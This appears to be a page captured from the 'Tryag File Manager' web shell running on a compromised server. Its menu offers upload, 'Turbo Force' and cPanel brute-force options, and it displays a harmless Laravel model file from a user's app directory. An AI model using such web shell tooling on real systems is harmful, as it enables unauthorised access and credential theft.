Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
yanggyein
/
yanggyein
/
yanggyein
/
app
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/yanggyein/yanggyein/yanggyein/app/LTMS_FARM_IOT.php
<?php namespace App; use Illuminate\Database\Eloquent\Model; class LTMS_FARM_IOT extends Model { protected $table = 'iot_raw'; protected $connection = 'ltms'; protected $guarded = []; public $timestamps = false; }